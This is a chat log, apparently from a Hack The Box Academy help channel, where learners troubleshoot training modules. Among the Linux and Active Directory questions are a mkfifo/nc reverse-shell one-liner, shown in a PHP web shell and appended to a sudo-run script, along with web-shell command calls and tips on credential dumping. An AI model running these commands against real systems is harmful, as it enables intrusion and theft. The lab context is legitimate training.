#modules

Do you have enough cubes?

it says head cannot open n3

I don't think I do, but I also can't see how many cubes this modules requires

Could also be an ad-blocker thing

If you don't have the cubes, you can't enroll

I'm gonna have an aneurysm at this point

Yep, this was the issue. For some reason Brave browser just don't return anything when I click the button

😩

Yep you can disable ad-blocker for htb as they don't serve ads

@charred fable

Head -n3 isn't meant to be run on its own

I'm telling you to pipe the apt list command, into head -n3

As I typed out here

The first thing it says after the warning

should I google how to run the head -n3 or can you tell me ?

...

I fucking showed you the exact command to run

the command head just returns the first lines of an output. the flag -n3 returns the first three lines

Yes

I'm just more frustrated by the lack of comprehension, as I said it multiple times

Of an input* btw

thank you

Pipe just takes the stdout of a command and makes it the stdin of the following command

most commands support this

https://tenor.com/view/squidward-spongebob-fml-done-gif-5806344

@acoustic owl ^

https://tenor.com/view/this-is-the-way-tom-the-cat-tom-and-jerry-spank-hit-gif-15650102

I hope you can feel my frustration second-hand payload

apt list --installed | head -n3 ?

...if only I said that earlier

You really need to pay attention more: I said it a couple times, but yes

ok but that dont show me the correct answer

It's not meant to show you the correct answer

It's meant to show you why it's giving you the wrong answer

One of the lines there stands out as not a package doesn't it

strange

it shows me 3 , 2 installed

Mhm and the first line?

no it shows me 2

and both are installed

No, it's showing you 3 lines total

All 3 of those lines are in the output that wc is counting

ok but Its showing me 2

Let me make it more obviously

3 lines but its 2

Do me a favor

Pipe that to wc -l

Just do that

So apt list --installed | head -n3 | wc -l

Maybe that'll help it click

3

ok u were right there. but the correct answer is 737 so ...

Correcr

i use 'apt list --installed | wc -l' and listed 738, but wrong answer

I swear to God, if you don't read up in this chat rn to go through the explanation why it's wrong

So. Something is being counted extra

Perhaps the line above the first "installed" item

ok me to. I get 738

There's two options now to get the right answer, both involve grep

I will explain how you get the correct answer

One involves grep -v [first line of the incorrect output]

Or grep "specific word"

Both will give you the right answer

I'm going to have breakfast, then I'll be back lol

The above steps I pointed out illustrate why the answer is wrong

thank you

The warning message isn't counted in wc

As its displayed even though you piped it

dpkg -l | grep '*ii' | wc -l

that gave me the correct answer

I dont understand it but thats what gave me the right answer

If you don't understand it then break it down per command in the pipeline, start with dpkg -l

Warning you should probably do dpkg -l | more

So you don't have a screen full of a bunch of stuff

And can look through it easier

I'm trying to walk you through how you can get apt to get you the same answer

At least letting you use your brain to make connections yourself

yes but the problem is that I dont get the same answer

Which is why I'm walking you through how to figure it out

Back to this step, what do you think the "specific word" is

I dont know can you please tell me

Use your brain

What's the common thing with the output when you used head

If you can't learn to figure stuff out on your own, you're gonna have a really rough time in-general with learning

thats why Im here trying learn and get some help

Yes, but you're not always gonna have someone to basically spell it out for you

At some point you gotta stand on your own

I've given you 99% of the information/how to get the information

I didnt understand your explanation

It's up to you to get the last 1%

You have all available info to figure out the missing pieces

I told you to use head as a quick way to evaluate the output given to you

bump for any tips

Sorry we drowned your request out

I think it's asking for the keyword here without brackets

And maybe the semicolon?

This question is about writing the right keyword in the rule. The module explains where exactly the user agent is transmitted. This term is searched for

helloo

new here

we can see that; this isn't a gen chat

apt list --installed | head -n3 | wc -l
didnt work ,, what did I do wrong then ?

because you don't wc -l that output

k ik

read #welcome to find out how to access more of the server

Sometimes it is difficult to explain something to someone. Maybe you just can't find the right words so that the other person understands it the way you meant it.

this was meant to show you that even though you only see 2 lines that are installed, it's counting 3 lines, so something is off about it

meaning you need to look at the output and engage your brain

Hello everyone !
I am in ACDS attack module and I have been in trouble for 3 hour with ESC11
I did exactly what room showed. I got hashes but it was wrong I decided to check I login with pth when I check hostname was "LAB-DC"
But room asking WS01
I couldn't know how to target WS01 can anyone help me?
If I follow ESC11 I am taking lab-dc's hashes not WS01

apt list --installed | head -n3 | ?

didnt work either

don't pipe to anything else

just apt list --installed | head -n3 you see 2 things installed and one other line

that one other line is why the output is incorrect

ok its shows me those 3. and that is not the correct answer

so you need to filter the apt list --installed with grep

head is not used for the final answer

it's purely just for ease of evaluating output

instead of needing to scroll up/down the terminal to find something

head -n3 just shows the first 3 lines of output

bro i was looking for a way to get it to show me the right answer

and your way wasnt the correct way

it didnt show me 737

i'm trying to help you figure it out on your own

i'm deliberately not telling you the full answer

wow

apt list --installed | grep "something" | wc -l

will it show me 737 ?

you need to replace "something" with a different word

what word will give me 737 ?

this is why i'm not telling you the direct answer; because you don't understand why

apt list --installed | head -n5 look for a common word in that output

and that's what you'll replace it with

aha ok

now im starting to get you

i gave you a longer list this time so you can work it out on your own

you should have been able to do this on your own if you used any bit of braincells i originally thought you had

I already held your hand far longer than i normally would have

hahhaha and I appreciate that

thank you for your patience

just be glad I'm bored

otherwise i would have given up long ago

especially since you already got the answer (using a different method that you also didn't bother to try and understand)

this doest mean I have found the right word 😩

like i said

use your brain, i'm starting to lose more faith with each time you come back that you have one

so it wont show me the correct answer or what do you mean ?

so apt list --installed gives you a close answer, but not the right one

how can the other way show me the correct answer and not the way you are showing

what is the common word in all the installed packages

installed automatic ?

word not words

installed

👍

https://phoenixnap.com/kb/dpkg-command#:~:text=dpkg in Linux is the,deb format.

this explains the dpkg output one

in short though ii for dpkg means installed

which is why i was waiting to explain it

ok but why dont apt show me 737 ?

if you grep for the right word, you'll get 737

:) like i said it's just one step away

ok Ill try it lets see

apt list --installed | grep "right word" | wc -l will give it to you

I'm doing the memory forensics module in Intro to Digital Forensics and ive been stumped on whats the process of using volatility for the last question
Examine the file "/home/htb-student/MemoryDumps/Win7-2515534d.vmem" with Volatility. Enter the Pid of the process that loaded zlib1.dll as your answer.
Furthest i've gotten really is checking the handles and grepping for zlib1.dll to find it at C:\ProgramData\ggzstcat367\TaskData\Tor\zlib1.dll
vol.py -f Win7-2515534d.vmem --profile=Win7SP1x64 dlllist -p <pID> | grep zlib
surely there's a better approach than me running dlllist on every process ID?

https://tenor.com/view/praise-dance-bless-him-shout-shouting-gif-16194864

haha now I really got it

now it will stick for sure

once again thank you for your patience

User-Agent is a header in http get method, in log4shell exploitation attempt the payload is embedded within the user agent, i've got the uri which is putted in user-agent, still its not the right answer, i feel like im in rabbit hole

hi! I'm going through the module:Introduction to Active Directory
I'm stuck on a simple question, either I'm not translating the question correctly through the translator, or I'm writing it wrong..?
What role ensures that objects in a domain are not assigned the same SID?(full name)

It's not about finding the string, but about telling the rule where to look.
Look again in the module to see exactly how you do this. You are absolutely right with your explanation above.

The module is easy, but due to the fact that the language and the translation itself can be crooked, it’s just trash))

k, thanks, ill do that

Can anyone tell me the answer? I write: Relative ID (RID) Master

Says it's not the right answer(

got it, great thanks for help

Can any one help me in BROKEN AUTHENTICATION
Predictable Reset Token

Try it without || „(RID)“||

Without knowing exactly what the problem is, it will be difficult to help you

Thank U)

I try different thing with the script but I don't know If i am missing something in the script

Due to the fact that the translation is a little bit bitty, the cost of 1.5 hours is spent on this)

You may need to use a different tool to translate.

If it doesn't work, something is wrong 🤷‍♂️

Can I dm you with the script

Hi everyone, I am not sure if this is the right place but I am taking the new learning path called senior web penetration tester and I am taking a module called injection attacks, I got stuck on the skill assessment the final challenge, if anyone is familiar and finished this module please DM me here in discord. thank you so much 🙂

Hey, guys I'm currently stuck on the first question on the Skills Assessment section of Intro to Assembly. I figured the second question out but I've been stumped on this one for a few days now. Any pointers in the right direction would be much appreciated 👍

sure

why has my thrad on digital forensics been deleted? bs i cant get any help with a single question

hrm what's the python3 cmd to upgrade shell?

knew i saw it in a previous module..

python3 -c 'import pty;pty.spawn("/bin/bash")'

You mean this?

@analog dock ah yes.. ty

module 18, section 80 for linux fundamentals

help in last question

curl in website "https://www.inlanefreight.com"and filter all unique paths of that domain

i did use curl "site" | wc -l

what's command for filter "all unique paths"??

#modules message

i need help on the module Windows Privilege Escalation: Interacting with Users, i setup the responder and put the scf file in the share, but i did not get the hash of the SCCM_SVC user, he never call back to my responder

nvm lol, i reset the box and now i got the hash

How many services are listening on the target system on all interfaces? (Not on localhost and IPv4 only)
what am I doing wrong, I typed
ss -l -4 | grep "LISTEN" | grep -v "127" | wc -l

Hi, i have been doing cybersecurity and ctfs for the better part of a year now and i have just recently made my mind up to start bug huntig on intrigriti, but what i have relisef is that the hole thing is very hard and confusing, so i am writing this message to maby get some tips and tricks and also to connect with somebody that is willing to hep me

see "man ss", its help me

Hey, my question is about optional task in "Target Function" in "Introduction to Whitebox Pentesting" module. I can't see console.log output in DEBUG CONSOLE.

You can see my breakpoints and payload on the following photos.

Payload:
curl -s -X POST -H "Content-Type: application/json" -H "Authorization: Bearer <token>" -d '{"text":"\"console.log(\"hello\")\""}' http://localhost:5000/api/service/generate

thanks

Js is so hard

I cant do it anymore

:troll~1

SECURITY MONITORING & SIEM FUNDAMENTALS --> Introduction To The Elastic Stack -->Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Discover". Then, click on the calendar icon, specify "last 15 years", and click on "Apply". Finally, choose the "windows*" index pattern. Now, execute the KQL query that is mentioned in the "Comparison Operators" part of this section and enter the username of the disabled account as your answer. Just the username; no need to account for the domain.

I only get the usernames ||administrator and Administrator|| but both are not correct. Anyone a nudge?

feel free to dm, but I remember there was a code they searched for where a disabled account attempted login, did you use that in your query? It's been a while for me

Im trying to do Windows Attacks & Defense > Coercing Attacks & Unconstrained Delegation, I am trying to follow along but stuck at the first command. When i run Get-NetComputer -Unconstrained | select samaccountname i get a few blank lines under samaccountname .What am i doing wrong? The command works, but i gt a blank output instead of the results in the example. Im sure i could skip this step but it feels I am missing something if i cant identify which systems are configured for Unconstrained Delegation.

did you import powerview?

yeah

try Get-NetComputer -Unconstrained | gm -Type Properties

weird, open another terminal, import and run it again

tried that, or do you mean the command you just gave me

maybe reset target and see if it fixes?

that's supposed to work

yeah seems like it didn't get imported properly

I think you're right, I had to run this before running that to import it:

Import-Module .\PowerView.ps1

can I get a sanity check..

find / rockyou.txt

should find where the file rockyou.txt exists in pwnbox right?

thats what i ran. I just rstarted WS001 and still have the same result

Did you run this before:

Import-Module .\PowerView.ps1

https://cdn.discordapp.com/emojis/993620378939314337.webp?size=48&name=REAL&quality=lossless

is PowerView in the downloads folder?

find the folder where powerview is before running that command, since it uses relative path

yeah, i have PowerView.ps1 and PowerView-main.ps1

okay folks, I need a small hint on Command Injection (https://academy.hackthebox.com/module/109/section/1042) module final assessment. I guess the smallest hint I could ask for is, ||is the method which can be injected a GET or POST command?||

On previous modules PowerView has worked fine

If you've successfully imported both Powerview scripts, and if you already tried resetting, theres's not much else I can think of to help

you can use locate which finds all files with names containing the string
locate rockyou
idk about pwnbox but it might not have the full rockyou available

I've just tried importing PowerView-main.ps1 again after the reboot and now it is working and i get the result as well as the errors in your screenshot (which i assume are nothing to worry about)

damn, locate worked like a charm.

have you used the find command before? maybe Im forgetting to use a switch or something (it's been a while). Thx, appreciate it :))

rockyou on pwnbox:

/usr/share/wordlists/rockyou.txt

find needs more filter since by default it's case sensitive and look for full match, this would be similar to the locate command

find / -type f -iname '*rockyou*' 2>/dev/null

locate is also way faster btw since it uses a pre indexed db to search for files

Thank you. Now I know what was up.

I tried find / --iname rockyou.txt but it threw a fit cus I used --, it's supposed to be -...

so find / -iname rockyou.txt worked... also... 2>/dev/null, so simple, beautiful. (redirects error to null) thx

get

thanks!

Hey folks, I'm trying to get local user groups for a service account as practicing the HTB Active Directory module

any pointers of any tool that can do it apart ldap from the attack machine ? Could not find a way with CME or enum4linux or rpcclient

you want to find the groups the user belongs to?

What powerful local group on the Domain Controller is the SAPService user a member of?

that's the challenge I need to complete to validate the modulle

also I can't winRM to target it seems 🙂

you can use cme:
nxc -M groupmembership
here it's netexec, the updated fork of cme

hi

Hello. Can anyone give a hint for this question from Active Directory Enumeration and Attacks, Skills Assessment Part 1?

I have got svc_sql user. But, can not find a path for local administrator on MS01 host

thanks mate

it's also in the GetUserSPNs.py output btw, but nxc is another way

MIght try this way then because can't install nxc on the jumbox and i'm lazy to tunnel from my own box 🙂

the jumpbox should have cme installed, same commands

Ah I get it now, groupmembership is not in the help because it's a module

you can list modules with -L

Yes, the cme verson on the box seems too old and does not have this module. Anyway, went thru via GetUserSPN 🙂

thx @next bronze

oh yeah my cme also doesn't have it, interesting

try to access ms01 with that user

Yeah I've read about CME that is going to be available only for paying contributors or something like that and netexec seems the way to go now

haha yeah a little more complicated than that but close, all the active devs moved to netexec

which do you prefer gnome or xfce? (kali linux)

personaly I don't use the UI 😄

I am running responder for a task and was wondering would I use tun0 or would I use my igolo adapter when using it?

Whatever interface you think would provide the details you need

how do i delete my credit card information

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.
What did I do wrong ? I typed
curl https://www.inlanefreight.com | tr "'"" "\n" | grep "www.inlanefreight.com/" | sort -u | wc -l
and Its showed me 0

Then walk your command back to see where it breaks

Hi guys on the module Active Directory enumeration & attacks #ACL enumeration, the last question is buggued because the machine crash everytime, someone can give me the answer please ?

Bro in Login Brute Forcing at the Service Authentication Brute Forcing section I successfully brute forced the password for the user for the ssh (following the steps given) and I simply cannot ssh into that user with the target address at all.

The steps say just to use ssh to connect to it and attempt the password. However, I am not able to ever attempt to enter the password I have gathered and it asks me if I would like to continue connecting, after typing yes it will just forever tell me permission denied. I am stuck due to what seems to be a technical error. It's upsetting because this section isn't even hard I'm just facing a bug or something.

Power shell can’t handle the command for me + a friend + multiple person according to the forum.

I tried
curl "https://www.inlanefreight.com"
It said cannot resolve host https://www.inlanefreight.com

probably DNS issue then

Add it into your /etc/hosts

Inlanefreight.com doesn't need to be added lol

It's a .com domain, it's on public root servers

how ?

If not mistaking, you can only access AD / Windows boxes through the jumphost. You need to ssh to the jumpbox, which will go through tun0 interface, but I don't think running responder on your local machine will ever work in the academy scenario

Ignore, they're incorrect about needing to do so

ok

Just finished attacking applications with ffuf - one of the questions required a recursive scan with a large wordlist with multiple files extensions which took well over 30 minutes. -t allows us to set the number of threads from the default of 40. Previously I have been using gobuster with -t 100 - what would be a good thread number to use for ffuf to spead up a very large recursive scan with multiple file extensions?

Ligolo is a pivoting tool

I had a pivot set up

ok my bad sorry 🙂 Then should use that one 😄

you can use bloodhound for this

Be wary bc too many threads on a live target may cause you to get temp blocked, or DoS the site

I tried but the info doesn’t appear, even in the « extra properties »

Why?

you can try changing the rate using the option -rate

what Im I doing wrong then ?

afaik ligolo can't forward smb traffic, you either need to use chisel or run responder on the jump host

I read it too fast I said that I made a mistake

out of curiosity, is ligolo better/easier than chisel ?

You are on the free plan or paid monthly plan from academy

paid

If free: pwnbox has limited internet access

Thank you. - good point for real engagements. How about for HTB - would there be a similar problem?

ah okay yea that makes sense now.

I thought igolo was able to do it all. I should have read more into it

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces it's been a while but this should help you find the right one

try adding -s ¯_(ツ)_/¯

Part of responder relies on broadcast traffic I think, and you won't likely be able to forward that broadcast traffic over a pivoting tool

at least the poisoining part

that could explain why I didnt get a hit

i accidenlty added an exam voucher that i can't afford and not ready for will the exam be boguht as soon as i get enough money in my credit card and if yes does anyone know how do i cancel that ?????????

Message support on the site

whats their email ?

Anyone have any idea about my problem? It sucks to be stuck on something that seems out of my control. The module indicates I should be allowed to attempt to ssh and should not get permission denied

customerops@hackthebox.com is it this

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

also yes.

Didnt help 😩

Did you solve it?

can you visit in a browser on the pwnbox ¯_(ツ)_/¯

Up

if ssh, try ssh -vvv to see where it hangs

yes

I'll need to check that, give me a sec

https://tenor.com/view/headache-stupid-people-oh-my-god-omg-oh-my-gosh-gif-22026951

okay this is quite weird, I tried writing alternative commands which would work in theory but doesn't return the right results, pretty sure the first time I did this module is using the commands given in the section but it indeed takes a long time to run. anyways here's the alternative commands that should work, but not in this case since some ACE are missing from the output and I can't be asked to find out why

Get-DomainObjectAcl -Identity "GPO Management" | Where-Object { $_.SecurityIdentifier -eq (Get-ADUser 'forend').SID.Value }

$gpogrpsid = Convert-NameToSid "GPO Management"; (Get-ADUser -Filter "Name -like 'forend'").DistinguishedName | ForEach-Object { Get-DomainObjectAcl -SearchBase $_ -SearchScope Subtree } | where { $_.SecurityIdentifier.value -eq $gpogrpsid }

since none of those works, the answer is in bloodhound, it's not the exact same name so check this link to find which should be the answer
https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces

Thank you a lot for the time you dedicated to it im really grateful for that

has anyone completed the dnsadmin section in the windows privilege escalation module? i seem to be running into an issue

i manage to add myself to the group, but cant see the flag or remove the value in the registry. i verified i am part of the domain admins group

np, also why I prefer remote tools tbh, this will get you the answer

nxc ldap 172.16.5.5 -u htb-student -p 'Academy_student_AD!' -M daclread -o TARGET='GPO Management'

compared to whatever mess that was earlier

I have a quick question, I finish all the free Basics Pen Testing Tier 0 section of the HTB Labs.. I'm thinking about putting that in my resume as projects, I'm wondering if there is a better way to add it to my resume?

If anyone have any ideas please let me know

i would just put in you work on hack the box modules in your resume under "free time" or mention it in a quick summary about yourself

@tiny mauve

try to log out and log back in, but if you can add yourself to DA, you can just get the flag

ive tried that and got a permission denied.

also tried gpupdate /force

try using the revshell method

bruh... I didn't do the ffuf module. lame

ig I'll be trying to find where the wordpress site is on

it's right in front of you

I'll get it eventually lol

Shells and Payloads, Assessment
i have found the file upload vuln, but it is mentioned there is a second upload vuln, i think its ||tomcat_mgr_upload||can someone verify if its the right one bc i want to test both.

Host-01

there are 2 upload vulns

Hey All, I'm struggling with the end of Nibbles. I had the reverse shell working, but it's not working anymore and I don't know what to do. I don't really know how I lost the reverse shell, or why it's not working anymore. I keep going over my steps and I can't figure out what's wrong. Any help greatly appreciated.

When I upload the PHP test file I can see that I have code execution, but then when I try to update it with my vpn ip and port with the provided one-liner to run the reverse shell, I get nothing. It worked before... idk what I'm doing wrong.

Thanks for your help, glad this is a good resource.

you’re welcome man, now you know it works on my machine think about why it doesn’t work on your machine

I'm just gonna block you if you're here to troll around.

cmon now

what's in your php revshell

Hey all - Looking to get some help if possible.

I'm doing the Javascript Deobfuscation skills assesment and hit a part where I'm stuck on the following question

Try to Analyze the deobfuscated JavaScript code, and understand its main functionality. Once you do, try to replicate what it's doing to get a secret key. What is the key?

I've got all the answers, but when looking, I don't see any key in the deobfuscated code which I haven't already used as an accepted answer...

EDIT: Oh, my bad. I missed over the fact of what I used to get the final answer! 😄

<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.23 42068 >/tmp/f'); ?>

is that your ip and are you listening on that port?

that's the ip of my vpn connection, and yes I'm listening on that port

└──╼ $nc -lvnp 42068
listening on [any] 42068 ...

did you curl the revshell

It worked my first few attermpts.

Yes.

└──╼ $curl http://10.129.88.137/nibbleblog/content/private/plugins/my_image/image.php

hm, reset the target and try again

I wouldn't consider htb learning as a project

yes but i asked if the msf module is the correct one

try it

Alright, thanks.. @median kettle @fathom pendant

I dont get why I'm not seeing my posts in here now 😦

Is there like a character limit or something?

can I DM you regarding this wordpress thing?

Resetting the target worked, but I'm still stuck at the very end...

I setup the HTTP server and see the GET /LinEnum.sh HTTP/1.1 200 posting.

running wget .../LinEnum.sh worked.. I then chmod +x'd LinEnum, and then ran ./LinEnum.sh That all worked.

sure

I made a monitor.sh.bak to be safe, then ran echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.23 42069 >/tmp/f' | tee -a monitor.sh

it's because the output is being parsed by the bot as spam

if you verify your account it'll likely stop it from being dumb

Then I run sudo /home/nibbler/personal/stuff/monitor.sh and I get
unknown': I need something more specific.
/home/nibbler/personal/stuff/monitor.sh: 26: /home/nibbler/personal/stuff/monitor.sh: [[: not found (x3)

Did I miss something? I don't see root.txt anywhere

try sudo bash /home/nibbler/personal/stuff/monitor.sh

UGH the machine stopped working again!!! just like last time!!!

this is very frustrating 😦

also: do you have your listener set up on the right port?

How do I verify my account so I can stop getting rate limited when asking for help?

read #welcome

it's not rate limiting; these channels are in slow-mode

Yes, I keep getting to this point and then it stops working becauser I'm probably taking too long or something idk

it's not tied to taking any specific amount of time

well it keeps needing me to restart it and redo the exact same things to work.

If you're not going to be helpful, don't say anything?

Really. Just not what I'm here for.

i'm telling you: what your doing appears to be correct - and works fine when I do it

Yes, that doesn't help anyone at all.

¯_(ツ)_/¯

try changing vpn region and respawning the target

creating a new file wasn’t necessary

I have to keep respawning it. Thta's the problem

I cant get to the end before it stops working

it's part of the recommendation to create a backup file

like working on a live engagement

when you ping the machine do you have stable ping or is it all over the place

wouldn’t he be creating it under the context of a non-root user

the file itself isn't a root file

afaik

all under 10ms

i forget if you need to also chmod +x the monitor.sh file

stable.

Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths of that domain. Submit the number of these paths as the answer.

How can I see the "unique paths". ?? before starting filterering

I typed curl "https://www.inlanefreight.com".
and I got alot text

haven't done that sectoin, but I assume it would involve grep? or one of those fancy sed things I don't know how to use 😅

it does involve grep

:P and tr iirc

curl grabs the source-code - you need to narrow that down to get the answer

yes but I mean before that. how do you know what too look for

what is the uniique here ?

"unique" means one-of-a-kind

no duplicates

there's a sort option that filters unique stuff

-u

your initial command should work pretty well

^

the command you posted way earlier should work

you got caught up for whatever reason your curl wasn't recognizing the site

now that sounds fixed

It's possible you have multipe vpn connections established. Maybe you have pwnbox and VPN or two VPN in different shells/windows

Yes I was targeting, so I stopped that and then I could open curl

but now im tryna figure out the filters

again: the command you pasted a while ago

if you don't understand a command there's always the man command to help fill gaps

so i verified the dll was successful, im in the domain admin group, ran gpupdate /force and logged out then back in. i still get access denied

can someone help? i been on this section for weeks now

Which module are you talking about?

windows privilege escalation, the section where you abuse dnsadmin privileges

oh same as me man, I kept going on with the remaining sections, but when I retry it I wanna try adding myself to the local admin group to read the flag, also since thats the DC you could dcsync and with DA, or you could grab the actual admin hash and psexec to the box - again these are things I wanna try since it kepts saying I dont have permissions to read the flag

ive tried adding myself to the local admin account but it doesnt work.

ive also tried changing admin password through cmd on admin mode but i still get denied. managed to upload a backdoor but couldnt get system level access

try to dcsync?

ima try that

you gotta do that through msf yea?

secretsdump

completely forgot about that

It happens XD

You could also use mimikatz, but the privileges problem might affect it, i plan to try secretsdump after I finish the module.

If your domain admin and have creds, you can psexec to connect to the domain if the restarting doesn't work for you

Also I noticed you said you logged out, try restarting also

restarting the machine?

No

also secretsdump.py doesnt seem to work

Hi, I'm on the second lab of the AD Enumeration module, trying to get the admin flag on the SQL01 host. ||I have a shell as mssqlsvc on the SQL01 host, and I identified the seImpersonate privilege enabled. I'm trying to download PrintSpoofer.exe to this machine in order to exploit it but it doesn't let me download anything to the box|| Any suggestions?

I don't recall exactly the approach, but there are likely file transfer methods that would work. What have you tried?

I have a powershell revshell, so I tried Invoke-WebRequest Client.DownloadFile etc

It seems like any time I add an output option to the command it just doesn't execute

for example, I tried running wget like: ||wget http://IP:port/exploit.exe and I get a hit on my python webserver, but if I run wget http://IP:port/exploit.exe --output exploit.exe it doesn't make a request to the webserver||.

Maybe that's blocked. Is SMB port open?

FTP?

I've tried smb but with no success, I'll try ftp as well. Thanks!

For smb, if it's open and you haven't tried I've found more success if I mount the smb network share with username and password.

I've started the smb server from the parrot attack machine: ||sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData ./|| and try to mount from ||SQL01 revshell using: net use X: \172.16.7.240\CompData || I don't get any error on the command but I don't see the ||X:|| share

you don't need to use the net use command, just copy what you want out from the share
cp \\ip\CompData\file

and make sure that host can reach the am server

I tried it first, I see that the user authenticates successfully but I don't get any file on the revshell session

Is anyone down to give me a sanity check on "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download."

I found something, it isn't working, just checking if I'm making a silly mistake of if I'm way off

This is in the Hacking Wordpress module

I ran: ||copy \\172.16.7.240\CompData\blabla.exe temp.exe|| and I see ||[*] User SQL01\SQL01$ authenticated successfully [*] SQL01$::INLANEFREIGHT:<SNIP> [*] Closing down connection (172.16.7.60,53881)|| But I don't have any file on the revshell host

you need an output location lol

copy \\IP\CompData\file.exe temp.exe like this?

yea

Doesn't work as well 😦

I don't remember this but should be in the wpscan output

any errors?

No, I get the output on the smb server that the client authenicated successfully and I get no error on client side

That's why I'm clueless

that's not possible, if there's no error than the file is copied, check the directory properly

There's not a file present, Idk. Both dir and ls don't show anything

Is the file in the hosted smb server

Yeah

The sytnax for net use seems wrong usually its net use X: \\IP\shareLocation (missing a \). Also, just to exhaust try creating the share with creds: sudo python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support CompData . -user {some username} -password {some password} then mount with net use X: \\IP\shareLocation /user:{some username} {some passsword}. Then you can you can try copy X:\filename path\filename

Doesn't work as well

Maybe the machine needs a reset

Are AD labs down? Been trying to get one to come up for over a half an hour!

I guess I answered my question. Not down, just takes 40 min to get in after resetting the machine multiple times!

👍

And after all of that the supplied mimikatz wont work!

hmm something is up... my hacking wordpress instance is coming on and off every once in a while... assuming they're having some issues... oh being ddos who know

Understanding Log Sources & Investigating with Splunk
Introduction To Splunk & SPL

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.

I found the answer but haven't use what the hint told me and my query doesn't show me the good account with the most login attempts. If someone can dm me I can show my query but i'm not sure to understand this one

idk the question is weird

it's asking what users made logins attempt ONLY within 10 minutes... and from those, what had the most logons

I'm stuck on the Attacking Common Services Hard lab, last question.

||I already impersonated the correct user, can interact with the linked sql server but when I try to retrieve the flag using EXECUTE('SELECT * FROM OPENROWSET(BULK ''C:/Users/Administrator/Desktop/flag.txt'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV]; I'm getting a memory allocation failure error. Am I on the wrong track here? ||

Edit: Nvm got it to work, ||I was using sqsh on my Kali box thought I should at least try to RDP into the client and try it from sqlcmd and that worked, not sure why but I'm not complaining.||

Yeah I know I did something for that but I still don't get the good answer can I dm you ?

sur eyou can dm

it works when I put the address on the browser... so I already have the answer... just curious why the curl didn't work

curl -X GET http://blog.inlanefreight.local/wp-content/themes/twentysixteen/404.php?cmd=ls /home/x/

I'm guessing it's something about the space betwee ls and /home, but I added a ` in the beginning and end and it didn't fix

tbh I already got the answer so I"m moving on... but if anyone got any ideas that would be cool

Is there a way to search an entire module for a text string? For example if I wanted to search the entire Windows Privilege Escalation module for the string 'pass the hash', is there a way to do that?

For the Windows Privilege Escalation module Pillaging, for the Optional Exercises what are you supposed to submit? There is no flag on the Administrators desktop.

on acitve subdomain enumeration in information gathering web edition, im really stuck on the following. i have no clue what to do. ive tried digging inlanefreight.htb with the target ip as the nameserver, digging the nameserver itself, etc. i put the ip linking to inlanefreight.htb in the /etc/hosts file.

What is the FQDN of the IP address 10.10.34.136?
What FQDN is assigned to the IP address 10.10.1.5? Submit the FQDN as the answer.
Submit the number of all "A" records from all zones as the answer.

if someone could just give me a small pointer or idea of what to try next that would be much appreciated.

I've been trying for almost an hour to connect to the AD lab for Credentialed Enumeration - from Linux. Not able to connect. I get an IP address when I spawn the machine, but cannot SSH or ping the address. I've tried connecting through all the US VPN servers (TCP and UDP), resetting the connection, terminating the box, refreshing my browser then starting again. Nothing seems to work.

Url encode the command, that makes it „ls+/home/x“. If you have a space in curl without enclosing the parameter in „“ it will be seen as two parameters

So it thinks the url ends after ls and another starts with /home/x

thanks @tranquil axle I appreciate the clarification, so add a + instead of a space, and wrap everything around in quotes. beautiful :)))

On the attacking wordpress module, skills assessment portion. I'm trying to gain a shell via msfconsole but it says it is unable to upload the payload. I have the username and password via wpscan. I also tried RCE but it wont let me upload the code. Am I missing something?

your lhost is wrong

but that doesn't seem to be the only issue, idk I've never used that msf module

"I also tried RCE but it wont let me upload the code. "

be patient, try different themes... It may be a permission thing, or a server is pooping thing.

I had to spend 40 minutes waiting on the server deciding to function or not for it to work

I ended up not using msfconsole

What do you mean you waited 40 minutes for the server to decide to function or not?

That when I pressed the edit button. Change apply. It would fail.

I did eventually tried another theme. But every once ina. While the server would go down. Aka. You go to the address and website won't load.

Wait a few minutes and It comes back

W000t https://academy.hackthebox.com/achievement/1052864/18

Im on the "permission management" why cant I spawn on my pwd box anymore ? I want to login in to htb_student but there is no Spawn button and I cant see the IP ?

it was the same on the page before

and when I go back 2 pages and take the IP from there it doesnt work on the "permission management" page

pwnbox or target? some sections won't have a target

i meant target
ok, /etc/ssh/sshd_config didnt work so I thought I could depend on that

you can do those questions without a target, in pwnbox or your own vm

allright Ill try that

I'm trying to do the Web Proxies module (on firefox), but when clicking on the spawn target button, it loads for a moment then goes back to the text asking me to click on it. I've cleared my cookies, and relogged in but still happening. Oddly, each time I click on it I get Cookie “__cf_bm” has been rejected because it is already expired. a few times in console. My system time is correct, so not quite sure what that could be. Any ideas on what could be causing this?

same seems to happen in chromium sans the cookie console warns

clear cookies?

yup, cleared them a few times. no dice:(

does the academy vpn have to be on to spawn the target, or just interact with it?

no you don't need vpn to spawn the target

Hey, I still can't get the file on the ||SQL01 machine|| second lab of AD module. I think there are not error showing at all on this shell, because even when I write invalid commands I don't get any erros showing

are you using a scuffed shell?

What other shell can I get on it?

||powershell revshell initiated by xp_cmdshell||

https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

I'll try it, thanks!

help please
I want to Search for all lines that contain a word that starts with Permit.
the page only shows me how to (a) [a-z] {1,10} \ .*

Why do you need to look for that?

thats the exercise

Section?

regular expressions

Also you need to learn how to adapt given information on your own

Im trying

before asking here i try alot

Ah, I skipped over this as it wasn't required

Im not trying to skip anything because Im new to all of this and I need to learn it

Think how you'd grep for a word: then modify that

grep -E "(Permit|permit)" /etc/passwd

I think * should be there somewhere but dont know how or where

